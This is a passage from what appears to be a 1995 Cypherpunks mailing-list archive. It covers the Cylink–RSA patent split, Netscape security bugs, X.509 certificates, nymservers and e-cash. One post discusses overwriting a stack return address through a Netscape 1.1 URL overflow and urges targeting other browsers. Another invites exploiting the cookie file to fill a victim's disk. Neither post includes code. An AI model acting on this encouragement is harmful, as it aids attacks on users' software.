special case) can expect cooperation in resolving the patent problem. Q. Why was PKP formed? A. Cylink formed PKP with RSA to pool both parties' rights to the Stanford and MIT patents, promote public key technology, and generate licensing revenue for the partners, the universities which owned the patents, and the inventors. Q. Why was PKP dissolved? A. Obviously great animosity has grown between the parties. The main reason is that RSA frustrated Cylink's efforts to settle the U.S. Government's efforts to license the Digital Signature Standard. Now that Cylink has the Stanford patents back, the DSS as well as other public key techniques can begin competing with RSA in the market. Q. How will these public key implementations compete with RSA? Isn't RSA a "de facto" standard? A. If anything, RSA software (which includes Stanford algorithms such as Diffie-Hellman) has been prevalent by "default" - not by choice. Now the market will have a choice between multiple vendors competing on price as well as technical implementation. Only after RSA's software faces the test of competition can it fairly claim to be a standard. Q. In his recent statement, RSA's president makes numerous accusations about Cylink's use of the RSA algorithm. What are the facts? A. The arbitrators award is very clear that Cylink in fact has certain rights to license the MIT patent. Specifically, Cylink has an option to license the MIT patent provided it uses some software provided by RSA. This places Cylink in a better position than RSA's other customers who have no rights to the Stanford patents. It is important to remember that Cylink built its business for the last ten years on the use of Stanford public key technology - which proves our point that you don't need RSA or its software to practice public key. Q. Doesn't Cylink use the RSA algorithm in one of its products. A. Yes, and only one. What RSA fails to mention is that Cylink's largest customer, SWIFT, already holds its own PKP license which the arbitrators forced RSA to grant. This license allows Cylink to make the product for SWIFT. Q. RSA claims that Cylink was offered a license to the RSA Patent, and that Cylink turned it down. Is that true? A. Like a lot of what RSA says, it's a half-truth. In June, 1994, RSA did offer a patent license, and Cylink did turn it down. Why? Because a condition of the license was that Cylink release RSA for all liability for its licensing practices. In other words, the price for the license was more than just the royalty. Cylink was being asked to forgive RSA for the wrongs it committed over the years, and this Cylink would not do. Q. Why did Cylink decide to use RSA is this one product? A. During PKP's existence, RSA frequently sought Cylink's support for its technology by asking Cylink to use RSA. While RSA now tells a different story, RSA's own newsletter (see, for example RSA's "Ciphertext" Fall 1993 issue) and corporate profile frequently promoted Cylink's use of RSA long before the parties fell into their dispute over licensing DSS. Having cooperated with RSA, and agreed to use their technology in one product, RSA tried to blackmail Cylink to stop PKP's settlement with the Government. In any event, the restrictions imposed by the arbitrators on RSA's licensing business are far more severe than the minor inconvenience Cylink may experience in retro-fitting its product with Stanford technology. Q. What will Cylink do with the Stanford patents now? A. Before the arbitrators' decision many of RSA's customers had no reason to doubt RSA's word. Those RSA customers who now come forward will be offered very favorable agreements. Cylink is more interested in establishing commercial relationships with RSA's licensees and promoting public key technology than in disrupting existing business. Q. Will Cylink attempt to stop the non-commercial use of public key (such as in PGP)? A. No. Although, technically, a Stanford patent license is needed for the public domain software such as PGP, Cylink intends to promote the use of public key on the Internet. Cylink intends to announce a royalty-free license for personal use after meeting with a spokesperson for the PGP community. Watch Cylink's home page for details. (http://www.cylink.com) Q. What advice can you give? A. Get the facts first. Read the arbitrators decision, including their September 12 ruling which denied RSA's request for modification. Then call us. (Call Bob Fougner at 408-735-5893, fax 408-735-6642, e-mail: fougner at cylink.com). ---------------------- Cylink Corporation ------------------------- John Kennedy Cylink Corporation 408-735-5885 jkennedy at cylink.com -- "Freedom is meaningless unless | ic58 at jove.acs.unt.edu - James Childers you can give to those with whom| No man's freedom is safe you disagree." - Jefferson | while Congress is in session EA 73 53 12 4E 08 27 6C 21 64 28 51 92 0E 7C F7 From bigmac at digicash.com Wed Sep 27 12:24:37 1995 From: bigmac at digicash.com (Marcel van der Peijl) Date: Wed, 27 Sep 95 12:24:37 PDT Subject: NO weak links ... In-Reply-To: Message-ID: <199509271924.UAA00338@digicash.com> Mats Bergstrom wrote: >Libel lawsuits for misunderstandings? > >Ridiculous. Libel threats are very rare on the CP list, >it's one of the list's features. (I can't recollect any such >threat since a well-known Nym was intimidated by LD, more >than a year ago - and that Nym eventually saw the light.) Oh come on. Don't take everything so seriously. This was not an explicit and/or real threat. >Go sue yourself. Suing myself is as unlikely as suing someone else. I am not American and do not know my lawyer on a first-name basis. You as fellow-European should understand this. // Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/ // "If you had to tell the Whole Truth, you'd never shut up." From shamrock at netcom.com Wed Sep 27 12:32:52 1995 From: shamrock at netcom.com (Lucky Green) Date: Wed, 27 Sep 95 12:32:52 PDT Subject: Fax encryption software Message-ID: <199509271930.PAA28222@book.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article , grafolog at netcom.com (Jonathan Blake) wrote: > I saw this article in alt.privacy. > > Anybody think the described encryption actually is worth > looking at. [...] >We are talking about a 72 bit engine that is more than >sufficiently strong for time sensitive general business purposes. [...] >>>It is fully licensed, without restriction for export, by the >U.S. >>>Department of Commerce. NO PGP WORRIES. These two statements are mutually exclusive. Snakeoil. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMGmmZyoZzwIn1bdtAQFrsQF/edmKXMashWa+yP9E4N/M0c/Rgwa4I6rm 0g0K8TzPc8hl4dP01Euiqcm1LAgHqbiL =rRO8 -----END PGP SIGNATURE----- From bigmac at digicash.com Wed Sep 27 13:48:36 1995 From: bigmac at digicash.com (Marcel van der Peijl) Date: Wed, 27 Sep 95 13:48:36 PDT Subject: Sorry or something Message-ID: <199509272048.VAA02445@digicash.com> In case it was not clear: my earlier post really was not a lawsuit threat. It seems it was (mis)interpreted this way by some people. Also, the original author did not post the article but someone he sent it to. I'm sure the author did not intend to post the text as is but first give us a fair chance of defending ourselves. #include "My opinions and reactions do NOT represent the official DigiCash standpoint." // Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/ // "If you had to tell the Whole Truth, you'd never shut up." From cman at communities.com Wed Sep 27 13:54:53 1995 From: cman at communities.com (Douglas Barnes) Date: Wed, 27 Sep 95 13:54:53 PDT Subject: WSJ on Netscape Hole 3 Message-ID: Somebody wrote: >> With Netscape 1.1 the state of the stack is much more dynamic, in >> particular the user can be viewing documents at an arbitary depth in >> the "web tree", each recursion will increase the stack pointer (or >> decrease with some architectures) There is no way of knowing for >> certain where you code will end up and thus no way to reliably alter >> the return address on the stack to execute your arbitary code. > I just tested this under Solaris 2.4 and it "turns out not to be the case." I approached my "bad" URL from a variety of other places, passing through various other pages, and the stack structure was still the same when I clicked on the bad guy. The big problem I'm having on this platform is the windowing register system on the SPARC architecture, which interacts in weird ways with the debugger. The lack of determinacy about where the stack is loaded in global memory _does_ seem to be a much bigger problem on the Mac, which is still not anything approaching a multi-tasking OS. Under Unix, proceses get their own address space to play in, which is always the same; on Macs, with their weird relocatable heaps, you never know where stuff is going to get loaded. I wonder how this is handled in Windows 95.... As for objections about how worthwhile this is, it's pretty clear that a patch will be available for this problem before we can finish and publicize an exploit. This is not, however, the last piece of network software that will contain problems of this sort, and it is a good idea to build up expertise in this area. I'd also suggest going after some of the other browsers... I know, for instance, that AOL's browser dies horribly on these same sort of URLs. Good luck, all. Doug From hallam at w3.org Wed Sep 27 14:02:59 1995 From: hallam at w3.org (hallam at w3.org) Date: Wed, 27 Sep 95 14:02:59 PDT Subject: Hack Microsoft NT C2 Rating? In-Reply-To: <199509261856.LAA24022@ix6.ix.netcom.com> Message-ID: <9509272102.AA21900@zorch.w3.org> >I'm more surprised by the rating since the Orange Book is basically >for non-networked systems; Red Book rating is _much_ harder, unless >the NSA's taking a different view of trustability of software encryption >for authentication purposes than they used to. I'm a little sceptical as to the relevance of C2. It is a set of criteria that is now very old and concerns military security where people can be told what to do. One way in which securoty systems often fail is in the security structure being so suffocating that people have to poke air holes in it so they can breathe. I think that c2 is possibly the limit of orange/red bookishness that is reasonable to work to. It is not a trivial level of security however, UNIX despite all the claims has never been shipped as C2 secure as standard by a mainstream vendor. Even requirements involving trivial effort but which are extreemly important such as the writing of a users security guide have never been taken seriously on any of the UNIX platforms on which I have worked. Phill From alano at teleport.com Wed Sep 27 14:04:54 1995 From: alano at teleport.com (Alan Olsen) Date: Wed, 27 Sep 95 14:04:54 PDT Subject: [NOISE] Re: Easter Eggs Message-ID: <199509272104.OAA16793@desiree.teleport.com> At 09:35 AM 9/27/95 -0400, you wrote: > Date: Tue, 26 Sep 1995 12:59:54 -0700 > From: Alan Olsen > > You also need X windows to find the Mozilla animated icon hack on > Jammie Zawinski's page. > ^^^^^^ > >Just for the record, that's Jamie. Hey! I never said I could type at 1am! Yes, I know. #%#$#%ing spelling flames. Grumble. Grumble. (BTW, the compass egg will show up in any page with /jwz/ in the url. The "anim" tag on his page is bogus.) > obNetscapeHack: There is a feature called a "cookie file" in > Netscape that is ripe for exploitation as a security leak. If you > are using a Netscape server (and you may not even need that), you > can feed all sorts of information into it without the user's > knowlege. I have heard of one page that overloads the cookie file > until the machine runs out of drive space. I am sure that there > are other exploitable holes there... Any takers? > >Yikes! That sounds really bad. Do you have any more information on >this? For example, can the server write to anything other than >$HOME/.netscape-cookies? If I write protect that file, but it's still >owned by me, will Netscape still modify it? The url for the spec is: http://home.netscape.com/newsref/std/cookie_spec.html. The cookie overload probibly only worked under 1.1 and before. The spec claims to have limits on the number of cookies you can have. But between this and the server API, I am sure that a hole or two has to exist. This is an area not explored by many. (For good reason. It is usually poorly documented...) OBParanoia: Want something to really make you worried. Imagine this for a web page... A local law enforcement agency decides that it wants to nab a few of those "computer preverts". They create a web site that has a cgi script that looks for providers from a list. It then has a link that shows up only for people at one of those sites to "get hot porn pics". They then collect enough machine names and other info, then use the collected information to obtain a warrent to seize the ISP's logs to match users with machines. (Most browsers to not report e-mail address.) In the current hysteria I do not see this scenerio too far off. Makes you wonder what constitutes entrapment anymore? | Minister of Forced Caffinization in the DNRC | alano at teleport.com | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From cman at communities.com Wed Sep 27 14:17:14 1995 From: cman at communities.com (Douglas Barnes) Date: Wed, 27 Sep 95 14:17:14 PDT Subject: JCrypt (was: getting netscape to support the remailers) Message-ID: > That was what I was thinking as well. I am confused by >Netscape's java support though.. I haven't seen very many details. Is >netscape going to only support applets or can you add stuff to the >runtime as well? In order to use jcrypt one needs access to add stuff >to the runtime I beleive. Currently jcrypt is implemented as a glue layer on top of RSAREF. This means it has to be accessed through native methods. Also, in general, one doesn't want to be downloading trusted security code every time one uses it, even if it has strong authentication (and this hasn't been built into Java yet.) So there are two questions: o Will netscape allow local trusted Java code to be invoked by downloaded applets? o Will netscape support native methods in such code? I would _greatly_ prefer to implement the jcrypt code in 100% java, but there are legal barriers to doing this where RSA is patented. JCrypt, however, is designed to allow the native methods to be replaced with Java should someone desire to do that. Also, there are other architectural concerns involving the direct or indirect invocation of local trusted encryption code by untrusted, downloaded software, which will be addressed somewhat in the next release of JCrypt. > >> >> > I started thinking about what it would take to get Netscape >> > to support sending mail through the remailers, after having >> > read the S/MIME specs which Netscape 2.0 is apparently going to >> > support. Perhaps with enough browbeating Netscape 3.0 will support >> > the remailers. >> >> Netscape doesn't need to support remailers explicitly since Netscape >>will be >> supporting Java. I think a remailer client is within Java's >>capabilities... >> Anyone disagree? >> >> andrew >> > > >-- >sameer Voice: 510-601-9777 >Community ConneXion FAX: 510-601-9734 >An Internet Privacy Provider Dialin: 510-658-6376 >http://www.c2.org (or login as "guest") sameer at c2.org From peace at BIX.com Wed Sep 27 14:51:06 1995 From: peace at BIX.com (peace at BIX.com) Date: Wed, 27 Sep 95 14:51:06 PDT Subject: Schnorr patent Message-ID: <9509271751.memo.21703@BIX.com> Now that PKP is dead, does anyone know how to contact C. Schnorr about his patent? Peace ..Tom From iagoldbe at csclub.uwaterloo.ca Wed Sep 27 15:02:29 1995 From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) Date: Wed, 27 Sep 95 15:02:29 PDT Subject: Insecurity in WWW oriented security In-Reply-To: <9509261509.AA10554@vampire.science.gmu.edu> Message-ID: <44ceto$7qo@calum.csclub.uwaterloo.ca> [Story about hospital wanting to use "secure" Netscape deleted.] On a similar note, just after the unssl announcement, I got email from someone who works in network security at the Pentagon, saying that users in his domain were "expressing their desires to use Netscape to do some sensitive things." I wonder if anyone's packet-sniffing the Pentagon? - Ian "I mean _besides_ the NSA." From habs at warwick.com Wed Sep 27 15:17:52 1995 From: habs at warwick.com (Harry S. Hawk) Date: Wed, 27 Sep 95 15:17:52 PDT Subject: [Q] Checkfree Wallet Message-ID: <199509272217.SAA22791@cmyk.warwick.com> I'm writing about security and the Internet and in particular about the Netscape bugs. I'm interested if anyone know technical details about the Checkfree Wallet system. Have they made code publically available, etc. BTW. THe Wallet system is supposed to be using ~768 bit public key system and it is reported to exportable. All decyption is done at Checkfree Corp. Users encode only the credit info, the WWW server signs the file and forwards it to Checkfree who will decrypt and process the credit card data. I've been told no credit card info is kept on any servers except for machines inside of Checkfree's network and that keep credit card numbers on file there. Please let me know if you know anything. Unless other indicate any information will be assume for publication. Background information is welcome as well. /hawk habs at panix.com writing for NetGuide Mag. -- From stewarts at ix.netcom.com Wed Sep 27 15:23:36 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 27 Sep 95 15:23:36 PDT Subject: alpha.c2.org nymserver Message-ID: <199509272222.PAA13596@ix7.ix.netcom.com> >> Also, I am having a LOT of grief trying to get the alpha.c2.org remailer to >> work for me... (yes, I have the help files) >> Could someone walk me through it? > >You mean the nym server at alpha.c2.org? It seems to have about a 1 week >delay on it... > >Be sure the reply block that you give it is your own, and that you tell >alpha which remailer the reply block goes to. If you get a copy of the latest Private Idaho beta, it's got a convenient set of user interfaces for using the nymservers, as well as for PGP, remailers, etc. (Runs on Windows, so some of you may not find it all _that_ convenient :-) PI works with either vanilla PGP or ViaCrypt. The first step is to get the PGP key for alias at alpha.c2.org installed in your key ring, and update PI's key tables (a menu item). Then choose the "Create a nym" menu item and follow all the dialog boxes. I found it a little confusing at first, since I didn't realize the nymserver just uses secret-key encryption and not public-key, so you don't need to create a public-key-pair to do it - the only PGP involved is encrypting the message sent to the nymserver. So you can now send mail to the _highly_ anonymous wcs at alpha.c2.org :-) #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Wed Sep 27 15:23:59 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 27 Sep 95 15:23:59 PDT Subject: X.509, S/MIME, and evolution of PGP Message-ID: <199509272223.PAA13812@ix7.ix.netcom.com> I'd always heard X.509 public key certificates were a hierarchical, evil, anti-WebOfTrust ISOism. But Netscape is now doing them, and talking S/MIME, so I sat down to read the specs, and they're really not all that bad. (Technically, I've only read PKCS#6 and RFC 1422, and not the real ISOisms...) Yeah, they've got lots of clunky ASN.1 Ambiguous Encoding Rules and X.500 Silly Name Format, but those can be lived with, and the X.500 may be possible to simply ignore in most cases. Steve Kent, author of RFC1422, envisions that a hierarchical world with government certification authorities would be the most convenient implementation, and with the X.500 directory service serving certificates, but that's primarily editorial and not required by the technology. Since a zillion and a half people are about to acquire Netscape 2.0, which supports non-Verisign-signed X.509 certificates and DES, we can definitely extend the Web of Trust concept to that world; can we also extend secure user-to-user messaging? It's time for PGP to mutate and take over the world... An X.509 certificate has the following components 1. version 2. serial number 3. signature (algorithm ID and parameters) 4. issuer name 5. validity period 6. subject name 7. subject public key (and associated algorithm ID) expressed as ASN.1 and signed with the issuer's public key. The issuer and subject names are expressed as X.500 addresses (big deal). The CA's public key is expected to be obtained out of band, or as a chain of signatures from some other CA that you got a signature for out of band; there's no policy implementation that says who can be one. The primary requirements on CAs are to never issue the same serial number twice, maintain uniqueness on signatures for subjects, and maintain a Certificate Revocation List which is accessible somehow. Unfortunately, the data format doesn't support multiple signatures, but the documentation _does_ explicitly indicate that you can _have_ multiple certifications; you just have to drag around a bunch of separate certificates, leading to some obvious implementation opportunities. CRLs are less well-specified, though the PEM RFCs suggest a PEM format; the main requirement is that they be keyed off the serial number, which is why that has to be unique. RFC 1422 proposes a rooted hierarchy of CAs - a root called the Internet Policy Registration Authority, which would certify a bunch of Policy Certification Authorities, which would each have different requirements on what their CAs require from people who want to be certified, ranging from anonymous personas to heavily identified Official People, and would do a certain amount of coordination to preserve uniqueness. Becoming a PCA would require paying money to the IPRA. However, there's no requirement that a _specific_ organization become the _one_ _official_ IPRA; if somebody were to volunteer and announce themselves as the IPRA, there's no particular conflict-resolution mechanism. [ maybe it's time for a Cypherpunks Press Release? No - I didn't say it. Not me! ] But rootedness only really matters to software that cares... and as long as your software accommodates N levels of certification, you can have a Web of Trust getting back to a key you signed yourself, and either get an official personna certificate or plug your public key into your software as the IPRA (and sign the real IPRA's certificate yourself :-) Problems: 1) ITAR - shouldn't be a big deal, because all of this is building a signature/authentication mechanism, it's not doing any encryption. The encryption, if any, is a user agent issue, and that's Netscape's problem; the Web of Trust tool is an add-on. 2) RSA patent - can this be built with RSAREF? Or RSAREF with permission for a couple extra activities? Or built out of RIPEM or RIPEM-SIG? The latter has the benefit of already being exportable. 3) Netscape compliance - the Netscape folks have been real friendly, and I hope they'll leave their format for getting certificates open. 4) Other software and CA policy-makers - getting out first is worth something; then you're the standard that they have to follow instead of the other way around. For some issues, like X.500 name vs. DNS name, there are probably people in the IETF or community in general working on it, or alternatively you can do an ugly hack abusing the organization and address fields. 5) S/MIME - real S/MIME compliance requires support for RC2 as well as publicly available algorithms, though this is really just an X.509 handler. 6) It's a lot of work - well, yeah, it is. And I'm lazy. Is there enough related code in SSLeay to steal to help implement it? #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Wed Sep 27 15:24:06 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 27 Sep 95 15:24:06 PDT Subject: Time Keys, Some Secure Ideas (by Alias: Jay Hyden) Message-ID: <199509272223.PAA13696@ix7.ix.netcom.com> Jay - you wrote: > >> Time Keys, Some Secure Ideas << > The weakest attack on a time key based system is to spoof the >computer that keeps track of time into releasing encryption >keys i.e. change the clock. No, the weakest link is that you have to trust the person _running_ the time key system. Spoofing the clock only matters to a system you trust. Even a system running on a satellite isn't trustable unless you're running it yourself; your good friend and business partner who launched it may have put in a backdoor because the KGB threatened to kill his grandmother if he didn't. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Wed Sep 27 15:24:29 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 27 Sep 95 15:24:29 PDT Subject: "Notes" to be Eclipsed by "Netscape" Message-ID: <199509272223.PAA13730@ix7.ix.netcom.com> >> I've never even _seen_ a copy of Notes running on any machine, nor do I >> know directly of _any_ of my colleagues who has. (Not saying nobody has, of >> course, just that I can't find anyone I know well who has.) Notes was a PC network reimplementation of PLATO, the system that also inspired notesfiles, a distant cousin of Netnews (though I'm not sure if netnews was originally inspired by PLATO or not...) Netnews assumes that articles are going to propagate for a while and then be trashed; notesfiles assumes you're building a knowledge bases that sticks around. (This transitoriness has allowed netnews to scale to its current N*100MB/day of trash :-) Notes is oriented more toward business kinds of collaboration, though it would work fine with university research projects. It's got all the PCish things you'd expect, with GUIs and menus and icons that let you include various sorts of documents and pictures as well as text; it seemed to be done reasonably well, and there's a growing market for Notes administrators. One definition of "business" is "customers who want this stuff enough that we can charge them big bucks for the servers"; client software has come down in price due to market resistance. One difficulty with Notes is that the earlier versions liked to run on Novell IPX instead of TCP/IP, so it didn't immediately jump onto companies' internal IP nets, or onto the global net for those brave souls willing to expose their business communications systems to the world. I do know companies who run multiple Notes systems so that Project X can communicate with its teaming partners at Company Y; I don't know how much integration they have with their internal Notes systems. AT&T Network Notes is a joint AT&T/Lotus project that uses AT&T's public IPX network to support Notes on; I think it's now rolled out an accepting customers, but it was mostly in press-release stage while I was at AT&T. Notes does have encryption, using RSA and I think RC4; I'm not sure if they do the 40 bits exportable/ 128 domestic bit or just use 40 bits. Don't know about overflow kinds of bugs; the bugs I've heard about were more problems integrating with Cc:Mail :-) #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From jsw at neon.netscape.com Wed Sep 27 15:28:27 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Wed, 27 Sep 95 15:28:27 PDT Subject: Security Update news release In-Reply-To: <199509261941.MAA02266@ix6.ix.netcom.com> Message-ID: <44cj4k$oee@tera.mcom.com> In article <199509261941.MAA02266 at ix6.ix.netcom.com>, stewarts at ix.netcom.com (Bill Stewart) writes: > >>Do the new versions use PGP's randseed.bin? If Netscape even only looks at > >>data used to keep PGP secure, Netscape will be banned from my computer > >>and every computer I am responsible for. -- For good. > > > >This is the second person who has expressed this sentiment. I don't > >understand it. If you believe that the possibility of randseed.bin > >getting out is dangerous, then why do you leave it online? Do you > >really trust every piece of software you run, every piece of software > >that can possibly access your machine over the net, to not look at > >that file? > > It makes a little bit of sense - I'm not aware of any software, > other than PGP and now Netscape, that _explicitly_ goes after randseed.bin, > though of course just about anything can try. Netscape will not read randseed.bin. I've changed it to use an environment variable that names a user specified file to read. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jsw at neon.netscape.com Wed Sep 27 15:45:42 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Wed, 27 Sep 95 15:45:42 PDT Subject: Golden Coy Freeh In-Reply-To: <199509251253.IAA07006@pipe4.nyc.pipeline.com> Message-ID: <44ck51$q0n@tera.mcom.com> In article <199509251253.IAA07006 at pipe4.nyc.pipeline.com>, jya at pipeline.com (John Young) writes: > Mr. Freeh wisely did not say whether the F.B.I. agents were > able to decipher the encrypted files seized in the > investigation. It would be foolhardy, from a > law-enforcement perspective, to tip one's hand. Maybe someone should file an FOIA request on this... --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From dsmith at midwest.net Wed Sep 27 15:47:24 1995 From: dsmith at midwest.net (David E. Smith) Date: Wed, 27 Sep 95 15:47:24 PDT Subject: Security Update news release Message-ID: <199509272302.SAA03139@cdale1.midwest.net> -- [ From: David E. Smith * EMC.Ver #2.5.02 ] -- -----BEGIN PGP SIGNED MESSAGE----- > >Do the new versions use PGP's randseed.bin? If Netscape even only looks at > >data used to keep PGP secure, Netscape will be banned from my computer > >and every computer I am responsible for. -- For good. > > This is the second person who has expressed this sentiment. I don't > understand it. If you believe that the possibility of randseed.bin > getting out is dangerous, then why do you leave it online? Do you > really trust every piece of software you run, every piece of software > that can possibly access your machine over the net, to not look at > that file? I'm still running MSDOS, so I suppose net connectivity isn't much of an issue :) At any rate, I set my randseed.bin to a length of 0 and then made in un-writable, so that new random bits have to be generated every time. It's not too much of a trouble for me; most of my PGP use is just signing messages to certain interested parties. How would Netscape handle the fact that there aren't any random bits here? Dave "old bits, new bits, red bits, blue bits" - -- David E. Smith, c/o Southeast Missouri State University 1210 Towers South, Cape Girardeau MO USA 63701-4745 +1(314)339-3814, "dsmith at midwest.net", PGP ID 0x92732139 Opinions this ludicrous are mine. Rational ones will cost you. Heh -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGnQnwwyfvCScyE5AQHzIQQAklOHwzKJY9P2DqAvdf4Rn1aZUNcqW3bz rk/FCrQP19WxqyTsO7RcRQ6q5ziwqU4qbMu+Xyci2qT0wEnOKFYhauLgLd0xxttA 7sqX9pEQVbLN9KCGz5AqFwDNlqVcdMqu0yo8s5gprmCFxDh0hXzt880rNn8tP6Id ErrhJ2NToZo= =0KRe -----END PGP SIGNATURE----- From scmayo at rschp2.anu.edu.au Wed Sep 27 16:18:40 1995 From: scmayo at rschp2.anu.edu.au (Sherry Mayo) Date: Wed, 27 Sep 95 16:18:40 PDT Subject: chaos cryptography Message-ID: <9509272318.AA20158@toad.com> Duh! As someone pointed out to me in email I wrote "stenography" when I meant "steganography" in the intro to the New Scientist article. (Well I'm sure ou all knew what I meant) Sherry From jsw at neon.netscape.com Wed Sep 27 16:39:53 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Wed, 27 Sep 95 16:39:53 PDT Subject: Netscape for Linux? In-Reply-To: <445hej$h03@tera.mcom.com> Message-ID: <44cnah$q0n@tera.mcom.com> In article <199509251135.HAA13693 at frankenstein.piermont.com>, perry at piermont.com (Perry E. Metzger) writes: > Jeff Weinstein writes: > > > ... would be nice if we could get 128 bit keys, though ... (hint, > > > hint). > > > > We are working this issue with the government. As soon as we can > > make it available for download we will. > In other words, we will never see it in our lifetimes -- the > bureaucreeps aren't known for promoting the spread of strong crypto. Where did I imply that if the govt. ignored us or said no that we would meekly go away with tail between legs? > By the by, are you guys going to be taking any action vis a vis the > discovery of weak keys in RC4? We are talking to RSA about this, since our crypto code is based on BSAFE code we got from them. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From todd at lgt.com Wed Sep 27 17:58:32 1995 From: todd at lgt.com (Todd Glassey) Date: Wed, 27 Sep 95 17:58:32 PDT Subject: First Payments WG Meeting Announcement Message-ID: FYI- the FSTC E-payment Working Group meeting is happening at the W3 meeting on the day before the meeting itself. The meeting is being held at the OSF facilities. >The World Wide Web Consortium is holding a Workshop on payments. The workshop >is intended to be a small, technically oriented meeting of its payments working >group. Although it is a members only event I am willing to listen to special >pleading, alternatively companies may wish to join the consortium at our >extreemely reasonable rates. See http://www.w3.org/pub/WWW/Consortium/ for >details. > >-- >Phillip M. Hallam-Baker Not speaking for anoyone else >hallam at w3.org http://www.w3.org/hypertext/WWW/People/hallam.html >Information Superhighway -----> Hi-ho! Yow! I'm surfing Arpanet! > >ANNOUNCE: First W3C Payments WG Meeting, October 11 > >---------------------------------------------------------------------------- > >What: 1st W3C Payment WG Meeting > >Where: MIT EECS, Grier Room 34-401 (subject to change) > >When: Wednesday October 11, 9am - 5pm > >Who: W3C Member Representatives ONLY > >URL: First W3C Payments WG Meeting > >W3C is making progress on supporting electronic payments on the web. This WG >Meeting has been called to foster discussion and feedback between W3C and >its members. Discussion will focus on proposals to the W3C for payment >protocols, interfaces, and e-commerce support. > >The agenda for the electronic payment workshop is still being settled. At >the current time we have confirmed presentations by VISA, IBM, W3C, and the >Financial Services Technical Consortium (FSTC). Additional invitations have >been issued, and suggestions for additional presentations would be welcome. >Contact Phillip Hallam-Baker (hallam at w3.org) or Jim Miller (JMiller at w3.org) >with suggestions. > >There is a separate W3C Security WG Meeting at MIT on Tuesday, October 10th. >Contact Rohit Khare for details (khare at w3.org) > >To RSVP for the Payments WG Meeting, email the coordinator, Phillip >Hallam-Baker (hallam at w3.org) or call 617/258-5967 by 5 October. This >workshop is aimed at technologists; please include a brief description of >any relevant payments work you or your organization are involved in. > >This is a preliminary announcement of the date and time only. We have >arranged for hotel rooms at the Kendall Square Mariott. To qualify for the >MIT discount, notify Susan Hardy (susan at w3.org). > >For a review of the Consortium's plans, see W3C's report on Electronic >Payment Schemes and the Third W3C Security Workshop. Regards, T. S. Glassey Chief Technologist Looking Glass Technologies todd at lgt.com -----BEGIN PGP SIGNATURE----- Version: 2.6 iQB1AwUBMFu5E6gNRnWhagU5AQHI+gL+Mwpcd3lAWd8FF06qcG6rnLhIYveHW71a XC7xh1T0uu8qnYX31yMp17OG28jWpKUbWec1IM9/eXOi+gInA7rKICWczV8zo9Z0 0puxjRRN7yO4KfRb3cPpk+r0p6pDg01Y =bTYb -----END PGP SIGNATURE----- From wilcoxb at nagina.cs.colorado.edu Wed Sep 27 18:29:14 1995 From: wilcoxb at nagina.cs.colorado.edu (Bryce Wilcox) Date: Wed, 27 Sep 95 18:29:14 PDT Subject: weak links in the cyberbucks demo (was: weak links in DigiCash system) Message-ID: <199509280129.TAA07801@nagina.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- Originally to Marcel van der Peijl at DigiCash. - ------- Forwarded Message To: "Marcel van der Peijl" Subject: weak links in the cyberbucks demo (was: weak links in DigiCash system) Date: Wed, 27 Sep 1995 19:20:16 -0600 From: Bryce Wilcox - -----BEGIN PGP SIGNED MESSAGE----- Marcel-- I'm sorry that my comments upset you so much, but I do not believe that they were unwarranted. It is true that the cyberbucks demo is insecure in some ways, such as using insecure e-mail. On the other hand your response that the demo is not about e-mail, it is about E-cash, and that you don't have the manpower to invest in making those extraneous things secure, is a good one and I am satisfied. The only thing I wish I had done differently was to make the title of the message "weak links in cyberbucks demo". There are, as far as I am aware, no weak links in the DigiCash system. I sincerely wish your company the best success, although I fear that MicroSoft and Visa and the like will successfully market inferior systems by use of their money and mindshare. In fact, a large part of the reason that I chose to sell BAP via a cybershop was to draw more attention to Ecash. I hope it is working. I guess if you have about a two-week queue for free cyberbucks, then maybe in a week I will get a whole lot of BAP purchases. :-) Regards, Bryce signatures follow To strive, to seek, to find and not to yield. bryce at colorado.edu http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Automatic PGP clearsigning under Unix with Bryce's Auto-PGP v1.0 iQCVAwUBMGn3/fWZSllhfG25AQEZegP/XMmoGuATQpfhBtNuIT/yUwFv9IL0+OXe auH1eMJ8d1PoWPJthrou7THpxkkOzJ0iV+GrTKS0n1dSQ2REbwk27SHsXce3LAEX 